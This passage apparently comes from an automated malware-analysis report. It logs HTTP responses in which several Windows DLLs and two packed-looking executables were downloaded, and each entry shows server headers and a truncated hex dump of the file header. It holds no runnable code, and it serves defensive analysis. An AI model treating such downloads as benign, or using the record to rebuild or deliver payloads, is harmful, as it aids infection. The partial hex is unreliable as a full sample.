65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 01:50:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:50:46 GMTContent-Type: application/octet-streamContent-Length: 3293184Last-Modified: Tue, 10 Dec 2024 01:22:43 GMTConnection: keep-aliveETag: "675797e3-324000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 50 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 32 00 00 04 00 00 f4 84 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 31 32 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 31 32 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 
90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 6a 7a 78 74 69 63 67 00 90 2b 00 00 b0 06 00 00 82 2b 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 67 79 70 76 74 6b 6a 00 10 00 00 00 40 32 00 00 06 00 00 00 18 32 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 32 00 00 22 00 00 00 1e 32 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:09 GMTContent-Type: application/octet-streamContent-Length: 1973248Last-Modified: Tue, 10 Dec 2024 00:57:10 GMTConnection: keep-aliveETag: "675791e6-1e1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 e0 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 87 00 00 04 00 00 b0 92 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 1b 86 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 
